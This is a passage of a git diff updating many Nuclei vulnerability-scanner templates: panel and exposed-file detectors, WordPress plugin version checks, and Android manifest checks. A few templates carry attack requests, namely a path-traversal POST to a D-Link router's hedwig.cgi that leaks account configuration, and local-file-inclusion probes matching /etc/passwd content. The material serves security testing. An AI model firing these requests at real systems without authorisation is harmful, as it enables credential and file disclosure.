'vuln:' + tags: cve,wordpress,wp-plugin,ditty-news-ticker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ditty-news-ticker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ditty-news-ticker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.42') \ No newline at end of file diff --git a/poc/other/dlink-850l-info-leak-7038.yaml b/poc/other/dlink-850l-info-leak-7038.yaml index fa5380e669..254efe51b6 100644 --- a/poc/other/dlink-850l-info-leak-7038.yaml +++ b/poc/other/dlink-850l-info-leak-7038.yaml @@ -1,20 +1,22 @@ id: dlink-850L-info-leak + info: name: Dlink Dir-850L Info Leak author: pikpikcu severity: info - reference: - - https://xz.aliyun.com/t/2941 + reference: https://xz.aliyun.com/t/2941 tags: dlink + requests: - method: POST path: - "{{BaseURL}}/hedwig.cgi" body: | - ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml + ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml headers: Cookie: uid=R8tBjwtFc8 Content-Type: text/xml + matchers-condition: and matchers: - type: status diff --git a/poc/other/dom-invaider.yaml b/poc/other/dom-invaider.yaml index bab3198027..ed65126d4c 100644 --- a/poc/other/dom-invaider.yaml +++ b/poc/other/dom-invaider.yaml @@ -2,10 +2,10 @@ id: dom-xss info: name: DOM XSS Sources & Sinks + reference: Inspired by https://portswigger.net/blog/introducing-dom-invader + # The existence of a sink or source does not by itself indicate a vulnerability. Due diligence must be performed on the results before opening a bug report. author: geeknik severity: info - reference: - - Inspired by https://portswigger.net/blog/introducing-dom-invader tags: xss,file file: diff --git a/poc/other/domcfg-page-7075.yaml b/poc/other/domcfg-page-7075.yaml index 043c52b3f7..1d9bad7a50 100644 --- a/poc/other/domcfg-page-7075.yaml +++ b/poc/other/domcfg-page-7075.yaml @@ -3,13 +3,14 @@ info: name: Lotus Domino Configuration Page author: gevakun severity: low - reference: - - https://twitter.com/Wh11teW0lf/status/1295594085445709824 - tags: exposure,lotus + reference: https://twitter.com/Wh11teW0lf/status/1295594085445709824 + tags: exposure + requests: - method: GET path: - "{{BaseURL}}/domcfg.nsf" + matchers-condition: and matchers: - type: word @@ -18,6 +19,7 @@ requests: - Mapping - Mappings condition: and + - type: status status: - 200 diff --git a/poc/other/ds_store-7119.yaml b/poc/other/ds_store-7119.yaml index a4c66b7fef..1d0bfb989a 100644 --- a/poc/other/ds_store-7119.yaml +++ b/poc/other/ds_store-7119.yaml @@ -1,29 +1,36 @@ id: ds-store-file info: - name: Directory Listing via DS_Store - author: 0w4ys + name: Exposed DS_Store File + author: 0w4ys,pwnhxl severity: info - tags: exposure + description: A .DS_Store file was found. This file may contain names of files that exist on the server, including backups or other files that aren't meant to be publicly available. + reference: + - https://github.com/lijiejie/ds_store_exp + metadata: + max-request: 1 + tags: exposure,files,ds_store,config -requests: +http: - method: GET path: - "{{BaseURL}}/.DS_Store" matchers-condition: and matchers: - - type: word - words: - - "\x00@\x00" + - type: dsl + dsl: + - "contains(body, '\0@\0')" + - "contains(hex_encode(body), '0000000142756431')" + condition: or - - type: status - status: - - 200 + - type: dsl + dsl: + - 'status_code == 200' - - type: word - words: - - "Accept-Ranges: bytes" - - "octet-stream" + - type: dsl + dsl: + - 'contains(to_lower(header), "accept-ranges: bytes")' + - 'contains(to_lower(header), "octet-stream")' condition: or - part: header +# digest: 4b0a00483046022100d3f35123cbd855e0ccab57c96f138dd54b3629cfb4784ee5c4161283a7656bbe0221009e8dc3c9bacb26eba104f28692289335bee62fe473c2c558bd1440c04997353c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/dss-download-fileread-7117.yaml b/poc/other/dss-download-fileread-7117.yaml index 2f1fbad448..881e7a4334 100644 --- a/poc/other/dss-download-fileread-7117.yaml +++ b/poc/other/dss-download-fileread-7117.yaml @@ -1,8 +1,13 @@ id: dss-download-fileread info: - name: DSS Download File Read + name: DSS Download - Local File Inclusion author: ritikchaddha severity: high + description: DSS Download is vulnerable to local file inclusion. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 tags: lfi,dss,lfr requests: - method: GET @@ -18,3 +23,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/07/22 diff --git a/poc/other/dynamic-broadcast-receiver-7140.yaml b/poc/other/dynamic-broadcast-receiver-7140.yaml index 3fa4a109cb..d2ea9a6123 100644 --- a/poc/other/dynamic-broadcast-receiver-7140.yaml +++ b/poc/other/dynamic-broadcast-receiver-7140.yaml @@ -1,16 +1,16 @@ -id: dynamic-registered-broadcast-receiver - -info: - name: Dynamic Registered Broadcast Receiver - author: gaurang - severity: info - tags: android,file - -file: - - extensions: - - all - - matchers: - - type: word - words: +id: dynamic-registered-broadcast-receiver + +info: + name: Dynamic Registered Broadcast Receiver + author: gaurang + severity: info + tags: android,file + +file: + - extensions: + - all + + matchers: + - type: word + words: - ";->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)" \ No newline at end of file diff --git a/poc/other/easy-custom-code.yaml b/poc/other/easy-custom-code.yaml new file mode 100644 index 0000000000..12300cc559 --- /dev/null +++ b/poc/other/easy-custom-code.yaml @@ -0,0 +1,59 @@ +id: easy-custom-code + +info: + name: > + Easy Custom Code (LESS/CSS/JS) – Live editing <= 1.0.8 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f16ea30d-0d03-4464-b75d-e77264af2510?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-custom-code/" + google-query: inurl:"/wp-content/plugins/easy-custom-code/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-custom-code,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-custom-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-custom-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.8') \ No newline at end of file diff --git a/poc/other/easy-media-gallery-pro-listing-7152.yaml b/poc/other/easy-media-gallery-pro-listing-7152.yaml index de7c8f2d98..92142aacf4 100644 --- a/poc/other/easy-media-gallery-pro-listing-7152.yaml +++ b/poc/other/easy-media-gallery-pro-listing-7152.yaml @@ -1,25 +1,22 @@ -id: easy-media-gallery-pro-listing - -info: - name: WordPress Plugin Media Gallery Pro Listing - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6455 - tags: wordpress,listing,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "wp-content/plugins/easy-media-gallery-pro/" - condition: and - - type: status - status: - - 200 +id: easy-media-gallery-pro-listing +info: + name: WordPress Plugin Media Gallery Pro Listing + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6455 + tags: wordpress,listing,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-media-gallery-pro/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "wp-content/plugins/easy-media-gallery-pro/" + condition: and + - type: status + status: + - 200 diff --git a/poc/other/elmah-log-file-7207.yaml b/poc/other/elmah-log-file-7207.yaml index acf3e9c002..7d4a53f33c 100644 --- a/poc/other/elmah-log-file-7207.yaml +++ b/poc/other/elmah-log-file-7207.yaml @@ -4,6 +4,7 @@ info: name: elmah.axd Disclosure author: shine severity: medium + tags: logs,exposure requests: - method: GET diff --git a/poc/other/emerson-power-panel-7216.yaml b/poc/other/emerson-power-panel-7216.yaml index e0e1bc8c65..92e76704ce 100644 --- a/poc/other/emerson-power-panel-7216.yaml +++ b/poc/other/emerson-power-panel-7216.yaml @@ -1,21 +1,25 @@ id: emerson-power-panel + info: name: Emerson Network Power IntelliSlot Web Card Panel author: princechaddha severity: info metadata: - shodan-dork: http.title:"Emerson Network Power IntelliSlot Web Card" + shodan-dork: 'http.title:"Emerson Network Power IntelliSlot Web Card"' tags: panel,intellislot,emerson + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - "Emerson Network Power IntelliSlot Web Card" + - type: status status: - 200 diff --git a/poc/other/envision-gateway-7226.yaml b/poc/other/envision-gateway-7226.yaml index 21d8475531..f233af07e2 100644 --- a/poc/other/envision-gateway-7226.yaml +++ b/poc/other/envision-gateway-7226.yaml @@ -3,10 +3,11 @@ info: name: EnvisionGateway author: dhiyaneshDK severity: low - reference: https://www.exploit-db.com/ghdb/7315 - tags: iot + reference: + - https://www.exploit-db.com/ghdb/7315 metadata: - shodan-query: 'http.title:"EnvisionGateway"' + shodan-query: http.title:"EnvisionGateway" + tags: iot requests: - method: GET path: diff --git a/poc/other/error-logs-7256.yaml b/poc/other/error-logs-7256.yaml index 6689addbc3..3d3ee67fc4 100644 --- a/poc/other/error-logs-7256.yaml +++ b/poc/other/error-logs-7256.yaml @@ -3,8 +3,7 @@ info: name: common error log files author: geeknik,daffainfo severity: low - tags: logs,exposure,error - + tags: logs,exposure requests: - method: GET path: @@ -35,7 +34,6 @@ requests: - "{{BaseURL}}/log.log" - "{{BaseURL}}/application/logs/application.log" - "{{BaseURL}}/application/logs/default.log" - matchers-condition: and matchers: - type: word @@ -48,12 +46,10 @@ requests: - "Exception" - "Fatal" condition: or - - type: word words: - text/plain part: header - - type: status status: - 200 diff --git a/poc/other/event-post-3323244e98c48bea38c0f4f2dd937cec.yaml b/poc/other/event-post-3323244e98c48bea38c0f4f2dd937cec.yaml new file mode 100644 index 0000000000..37aea4abdf --- /dev/null +++ b/poc/other/event-post-3323244e98c48bea38c0f4f2dd937cec.yaml @@ -0,0 +1,59 @@ +id: event-post-3323244e98c48bea38c0f4f2dd937cec + +info: + name: > + Event post <= 5.9.5 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/964950dc-d8e1-4a9b-bef2-ea51abc5a925?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/event-post/" + google-query: inurl:"/wp-content/plugins/event-post/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,event-post,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/event-post/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "event-post" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.9.5') \ No newline at end of file diff --git a/poc/other/export-activities.yaml b/poc/other/export-activities.yaml new file mode 100644 index 0000000000..7e55120a5a --- /dev/null +++ b/poc/other/export-activities.yaml @@ -0,0 +1,28 @@ +id: export-activities + +info: + name: Exported Activities + author: YoruYagami + severity: high + description: | + This template detects if activities are exported in the Android manifest file. Exporting activities can expose them to other applications, which might lead to unauthorized access or actions within the app. Ensure that only necessary activities are exported and that they are properly secured. + remediation: | + To remediate this issue, set the `exported` attribute to `false` for activities that do not need to be accessible by other applications. Example: + + ```xml + + ... + + ``` + +file: + - extensions: + - xml + + matchers: + - type: word + words: + - "android:exported=\"true\"" diff --git a/poc/other/export-content-provider.yaml b/poc/other/export-content-provider.yaml new file mode 100644 index 0000000000..019a781e3a --- /dev/null +++ b/poc/other/export-content-provider.yaml @@ -0,0 +1,29 @@ +id: export-content-provider + +info: + name: Exported Content Provider + author: YoruYagami + severity: high + description: | + This template detects if content providers are exported in the Android manifest file. Exporting content providers can expose them to other applications, which might lead to unauthorized access or actions within the app. Ensure that only necessary content providers are exported and that they are properly secured. + remediation: | + To remediate this issue, set the `exported` attribute to `false` for content providers that do not need to be accessible by other applications. Example: + + ```xml + + ... + + ``` + +file: + - extensions: + - xml + + matchers: + - type: word + words: + - "android:exported=\"true\"" diff --git a/poc/other/export-services.yaml b/poc/other/export-services.yaml new file mode 100644 index 0000000000..764b147860 --- /dev/null +++ b/poc/other/export-services.yaml @@ -0,0 +1,28 @@ +id: export-services + +info: + name: Exported Services + author: YoruYagami + severity: high + description: | + This template detects if services are exported in the Android manifest file. Exporting services can expose them to other applications, which might lead to unauthorized access or actions within the app. Ensure that only necessary services are exported and that they are properly secured. + remediation: | + To remediate this issue, set the `exported` attribute to `false` for services that do not need to be accessible by other applications. Example: + + ```xml + + ... + + ``` + +file: + - extensions: + - xml + + matchers: + - type: word + words: + - "android:exported=\"true\"" diff --git a/poc/other/exsi-system-7366.yaml b/poc/other/exsi-system-7366.yaml index c712c2c2da..5d0f6db262 100644 --- a/poc/other/exsi-system-7366.yaml +++ b/poc/other/exsi-system-7366.yaml @@ -1,5 +1,4 @@ id: exsi-system - info: name: ESXi System author: dhiyaneshDK @@ -7,12 +6,10 @@ info: metadata: shodan-query: html:"esxUiApp" tags: panel,esxi - requests: - method: GET path: - '{{BaseURL}}/ui/#/login' - matchers-condition: and matchers: - type: word diff --git a/poc/other/eyelock-nano-lfd-7376.yaml b/poc/other/eyelock-nano-lfd-7376.yaml index 00cac065e0..4588265113 100644 --- a/poc/other/eyelock-nano-lfd-7376.yaml +++ b/poc/other/eyelock-nano-lfd-7376.yaml @@ -1,11 +1,12 @@ id: eyelock-nano-lfd info: - name: EyeLock nano NXT 3.5 - Local File Disclosure - description: + name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval author: geeknik - reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt severity: high - tags: eyelock,lfd,traversal,iot,biometrics + description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. + reference: + - https://www.zeroscience.mk/codes/eyelock_lfd.txt + tags: iot,lfi,eyelock requests: - method: GET path: @@ -19,3 +20,5 @@ requests: regex: - "root:[x*]:0:0:" part: body + +# Enhanced by mp on 2022/04/08 diff --git a/poc/other/f-secure-policy-manager-7563.yaml b/poc/other/f-secure-policy-manager-7563.yaml index 2e91d70585..52a841605a 100644 --- a/poc/other/f-secure-policy-manager-7563.yaml +++ b/poc/other/f-secure-policy-manager-7563.yaml @@ -4,8 +4,7 @@ info: name: F-Secure Policy Manager Server author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"F-Secure Policy Manager Server" + reference: https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22 tags: login,panel requests: diff --git a/poc/other/fatpipe-ipvpn-panel-7436.yaml b/poc/other/fatpipe-ipvpn-panel-7436.yaml index 272e22dc19..e66d5b095c 100644 --- a/poc/other/fatpipe-ipvpn-panel-7436.yaml +++ b/poc/other/fatpipe-ipvpn-panel-7436.yaml @@ -1,22 +1,28 @@ id: fatpipe-ipvpn-panel + info: name: FatPipe IPVPN® Panel Detect author: dwisiswant0 severity: info - reference: https://www.fatpipeinc.com/products/index.php + reference: + - https://www.fatpipeinc.com/products/index.php tags: panel,ipvpn,fatpipe + requests: - method: GET path: - "{{BaseURL}}/fpui/jsp/login.jsp" + matchers-condition: and matchers: - type: word words: - "FatPipe IPVPN | Log in" + - type: status status: - 200 + extractors: - type: regex part: body diff --git a/poc/other/filebird-document-library-10519ee2038994c33579e35be102cb22.yaml b/poc/other/filebird-document-library-10519ee2038994c33579e35be102cb22.yaml new file mode 100644 index 0000000000..c55b8e423f --- /dev/null +++ b/poc/other/filebird-document-library-10519ee2038994c33579e35be102cb22.yaml @@ -0,0 +1,59 @@ +id: filebird-document-library-10519ee2038994c33579e35be102cb22 + +info: + name: > + FileBird Document Library <= 2.0.6 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a6ff3028-07bb-49c2-b1e4-0f5910a53bd6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/filebird-document-library/" + google-query: inurl:"/wp-content/plugins/filebird-document-library/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,filebird-document-library,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/filebird-document-library/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "filebird-document-library" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6') \ No newline at end of file diff --git a/poc/other/filezilla-7471.yaml b/poc/other/filezilla-7471.yaml index fdfeca477f..79c0eed924 100644 --- a/poc/other/filezilla-7471.yaml +++ b/poc/other/filezilla-7471.yaml @@ -1,14 +1,18 @@ id: filezilla-exposed + info: name: Filezilla author: amsda severity: medium + tags: exposure + requests: - method: GET path: - "{{BaseURL}}/filezilla.xml" - "{{BaseURL}}/sitemanager.xml" - "{{BaseURL}}/FileZilla.xml" + matchers-condition: and matchers: - type: word @@ -16,10 +20,12 @@ requests: - "" condition: and + - type: word words: - xml part: header + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/firebase-urls-7499.yaml b/poc/other/firebase-urls-7499.yaml index 18f0ab9edd..85b47f5bf6 100644 --- a/poc/other/firebase-urls-7499.yaml +++ b/poc/other/firebase-urls-7499.yaml @@ -1,23 +1,25 @@ id: firebase-urls - info: - name: Google Firebase DB URL Finder - description: Find firebaseio urls to check for security permissions + name: Find firebaseio urls to check for security permissions author: panch0r3d severity: info - tags: tech,firebase,google - requests: - method: GET path: - - "{{BaseURL}}" - + - "{{BaseURL}}/" redirects: true - max-redirects: 1 - + max-redirects: 5 + headers: + User-Agent: "Mozilla UACanary12345" matchers-condition: and matchers: - type: regex regex: - ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?" part: body + extractors: + - type: regex + part: body + regex: + - "([^]|[']|[ ]|[:]|http)*(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])" + - "([^]|[']|[ ]|[:]|http)*(d|D)(a|A)(t|T)(a|A)(b|B)(a|A)(s|S)(e|E).*?([\r\n]|[}]|[,]|[>]|[-]|[ ]|['])" diff --git a/poc/other/form-vibes-8a79b0e68d315bd65896c206afb8b855.yaml b/poc/other/form-vibes-8a79b0e68d315bd65896c206afb8b855.yaml new file mode 100644 index 0000000000..67392231c4 --- /dev/null +++ b/poc/other/form-vibes-8a79b0e68d315bd65896c206afb8b855.yaml @@ -0,0 +1,59 @@ +id: form-vibes-8a79b0e68d315bd65896c206afb8b855 + +info: + name: > + Form Vibes <= 1.4.10 - Authenticated (Subscriber+) SQL Injection via fv_export_data + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a3311097-d477-441e-9bf3-3f991a9b6af9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/form-vibes/" + google-query: inurl:"/wp-content/plugins/form-vibes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,form-vibes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/form-vibes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "form-vibes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.10') \ No newline at end of file diff --git a/poc/other/fortinet-fortigate-panel-7535.yaml b/poc/other/fortinet-fortigate-panel-7535.yaml index a36a47836d..df08aa8d97 100644 --- a/poc/other/fortinet-fortigate-panel-7535.yaml +++ b/poc/other/fortinet-fortigate-panel-7535.yaml @@ -4,7 +4,7 @@ info: name: Fortinet FortiGate SSL VPN Panel author: bsysop severity: info - tags: panel,fortinet,fortigate + tags: panel requests: - method: GET diff --git a/poc/other/foulenzer-subdomain-tk (copy 1).yaml b/poc/other/foulenzer-subdomain-tk (copy 1).yaml index 81f5540d05..0a58e00fdb 100644 --- a/poc/other/foulenzer-subdomain-tk (copy 1).yaml +++ b/poc/other/foulenzer-subdomain-tk (copy 1).yaml @@ -1,16 +1,15 @@ id: detect-all-takeovers info: - name: Subdomain Takeover Detection - author: "melbadry9 & pxmme1337 & geeknik" + name: Subdomain takeover finder + author: "melbadry9 & pxmme1337" severity: high # Update this list with new takeovers matchers # Do not delete other template files for takeover # https://github.com/EdOverflow/can-i-take-over-xyz - # You need to claim the subdomain / CNAME of the subdomain to confirm the takeover. - # Do not report subdomain takeover issues only based on detection. - # Total number of services #72 + # You need to claim the CNAME the subdomain to confirm the takeover. + # Do not report this without claiming the CNAME. requests: - method: GET @@ -20,14 +19,14 @@ requests: matchers: - type: word - name: agilecrm + name: pantheon.io words: - - Sorry, this page is no longer available. + - "The gods are wise, but do not know of the site which you seek." - type: word - name: airee + name: aws-s3-bucket words: - - Ошибка 402. Сервис Айри.рф не оплачен + - "The specified bucket does not exist" - type: word name: anima @@ -35,15 +34,65 @@ requests: - "If this is your website and you've just created it, try refreshing in a minute" - type: word - name: aws-bucket + name: ghost words: - - "The specified bucket does not exist" + - "The thing you were looking for is no longer here, or never was" + + - type: regex + name: worksites + regex: + - "(?:Company Not Found|you’re looking for doesn’t exist)" - type: word - name: bitbucket + name: landingi words: - - The page you have requested does not exist - - Repository not found + - It looks like you're lost + - The page you are looking for is not found + + - type: word + name: helprace + words: + - Alias not configured! + - Admin of this Helprace account needs to set up domain alias + - "(see Step 2 here: Using your own domain with Helprace)." + + - type: word + name: canny + words: + - Company Not Found + - There is no such company. Did you enter the right URL? + + - type: word + name: ngrok + words: + - ngrok.io not found + - Tunnel *.ngrok.io not found + + - type: word + name: tumblr + words: + - Whatever you were looking for doesn't currently exist at this address. + - There's nothing here. + + - type: word + name: github + words: + - There isn't a GitHub Pages site here. + - For root URLs (like http://example.com/) you must provide an index.html file + + - type: word + name: heroku + words: + - There's nothing here, yet. + - herokucdn.com/error-pages/no-such-app.html + - "No such app" + + - type: word + name: tictail + words: + - Building a brand of your own? + - 'to target URL: redirected + + - type: word + name: bitbucket + words: + - The page you have requested does not exist + - Repository not found + + - type: word + name: smartling + words: + - Domain is not configured + + - type: word + name: acquia + words: + - If you are an Acquia Cloud customer and expect to see your site at this address + - The site you are looking for could not be found. + + - type: word + name: uservoice + words: + - This UserVoice subdomain is currently available! - type: word name: ghost @@ -69,16 +141,19 @@ requests: - The thing you were looking for is no longer here, or never was - type: word - name: github + name: tilda words: - - There isn't a GitHub Pages site here. - - For root URLs (like http://example.com/) you must provide an index.html file + - Domain has been assigned - type: word - name: hatenablog + name: wordpress words: - - 404 Blog is not found - - Sorry, we can't find the page you're looking for. + - Do you want to register + + - type: word + name: teamwork + words: + - Oops - We didn't find your site. - type: word name: helpjuice @@ -90,6 +165,32 @@ requests: words: - "No settings were found for this company:" + - type: word + name: cargo + words: + - If you're moving your domain away from Cargo you must make this configuration + through your registrar's DNS control panel. + + - type: word + name: feedpress + words: + - The feed has not been found. + + - type: word + name: surge + words: + - project not found + + - type: word + name: surveygizmo + words: + - data-html-name + + - type: word + name: mashery + words: + - Unrecognized domain + - type: word name: intercom words: @@ -97,37 +198,86 @@ requests: -

Uh oh. That page doesn’t exist.

- type: word - name: jetbrains + name: webflow words: - - is not a registered InCloud YouTrack. + -

The page you are looking for doesn't exist or has been + moved.

- type: word - name: kinsta + name: thinkific words: - - No Site For Domain + - You may have mistyped the address or the page may have moved. - type: word - name: launchrock + name: tave words: - - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens - to all of us. + - "

Error 404: Page Not Found

" - type: word - name: ngrok + name: wishpond words: - - ngrok.io not found - - Tunnel *.ngrok.io not found + - https://www.wishpond.com/404?campaign=true - type: word - name: pantheon.io + name: aftership words: - - "The gods are wise, but do not know of the site which you seek." + - Oops.

The page you're looking for doesn't + exist. - type: word - name: pingdom + name: aha words: - - Public Report Not Activated - - This public report page has not been activated by the user + - There is no portal here ... sending you back to Aha! + + - type: word + name: brightcove + words: + - '

' + + - type: word + name: bigcartel + words: + - "

Oops! We couldn’t find that page.

" + + - type: word + name: activecompaign + words: + - alt="LIGHTTPD - fly light." + + - type: word + name: compaignmonitor + words: + - Double check the URL or GetSimple » Installation" - "PHP Version" condition: and + - type: status status: - 200 diff --git a/poc/other/globalprotect-panel-7720.yaml b/poc/other/globalprotect-panel-7720.yaml index 4298d24801..83689fef37 100644 --- a/poc/other/globalprotect-panel-7720.yaml +++ b/poc/other/globalprotect-panel-7720.yaml @@ -4,18 +4,12 @@ info: name: PaloAlto Networks GlobalProtect Panel author: organiccrap severity: info - tags: panel,panos,globalprotect requests: - method: GET path: - "{{BaseURL}}/global-protect/login.esp" - - "{{BaseURL}}/sslmgr" - - stop-at-first-match: true matchers: - type: word words: - "GlobalProtect Portal" - - "Invalid parameters" - condition: or diff --git a/poc/other/go-anywhere-client-7743.yaml b/poc/other/go-anywhere-client-7743.yaml index 1aaa3fea26..3759a6984f 100644 --- a/poc/other/go-anywhere-client-7743.yaml +++ b/poc/other/go-anywhere-client-7743.yaml @@ -4,7 +4,7 @@ info: name: GoAnywhere client login detection author: iamthefrogy severity: info - tags: panel + tags: panel,goanywhere,login requests: - method: GET @@ -18,4 +18,4 @@ requests: words: - "Powered by GoAnywhere" - "GoAnywhere.com" - condition: or \ No newline at end of file + condition: or diff --git a/poc/other/gogs-workflow-7760.yaml b/poc/other/gogs-workflow-7760.yaml index fe715e04dc..e1ab4de7a7 100644 --- a/poc/other/gogs-workflow-7760.yaml +++ b/poc/other/gogs-workflow-7760.yaml @@ -1,11 +1,11 @@ id: gogs-workflow info: - name: Gogs (Go Git Service) - Security Checks + name: Gogs Security Checks author: daffainfo description: A simple workflow that runs all Gogs related nuclei templates on a given target. workflows: - - template: exposed-panels/gogs-panel.yaml + - template: exposed-panels/gogs-login.yaml subtemplates: - tags: gogs diff --git a/poc/other/haproxy-status-7885.yaml b/poc/other/haproxy-status-7885.yaml index bd365f8cc2..1f2eec4d1f 100644 --- a/poc/other/haproxy-status-7885.yaml +++ b/poc/other/haproxy-status-7885.yaml @@ -1,19 +1,25 @@ id: haproxy-status + info: name: HA Proxy Statistics author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/ghdb/4191 + reference: + - https://www.exploit-db.com/ghdb/4191 tags: logs,haproxy + requests: - method: GET path: - "{{BaseURL}}/haproxy-status" + - "{{BaseURL}}/haproxy?stats" + matchers-condition: and matchers: - type: word words: - 'Statistics Report for HAProxy' + - type: status status: - 200 diff --git a/poc/other/heatmiser-wifi-thermostat-7924.yaml b/poc/other/heatmiser-wifi-thermostat-7924.yaml index 1540175835..a6881d64e0 100644 --- a/poc/other/heatmiser-wifi-thermostat-7924.yaml +++ b/poc/other/heatmiser-wifi-thermostat-7924.yaml @@ -1,17 +1,19 @@ id: heatmiser-wifi-thermostat + info: name: Heatmiser Wifi Thermostat author: dhiyaneshDK severity: info - reference: - - https://www.exploit-db.com/ghdb/7445 - metadata: - shodan-query: http.title:"Heatmiser Wifi Thermostat" + reference: https://www.exploit-db.com/ghdb/7445 tags: iot + metadata: + shodan-query: 'http.title:"Heatmiser Wifi Thermostat"' + requests: - method: GET path: - '{{BaseURL}}/index.htm' + matchers-condition: and matchers: - type: word diff --git a/poc/other/honeywell-building-control-7987.yaml b/poc/other/honeywell-building-control-7987.yaml index b51eec555a..4060ffb863 100644 --- a/poc/other/honeywell-building-control-7987.yaml +++ b/poc/other/honeywell-building-control-7987.yaml @@ -1,20 +1,24 @@ id: honeywell-building-control + info: name: Honeywell Building Control author: dhiyaneshDK severity: info - tags: panel,iot metadata: - shodan-query: 'html:"Honeywell Building Control"' + shodan-query: html:"Honeywell Building Control" + tags: panel,iot + requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - 'Honeywell Building Control' + - type: status status: - 200 diff --git a/poc/other/hp-ilo-5-8020.yaml b/poc/other/hp-ilo-5-8020.yaml index 87e687904a..cefb985396 100644 --- a/poc/other/hp-ilo-5-8020.yaml +++ b/poc/other/hp-ilo-5-8020.yaml @@ -1,33 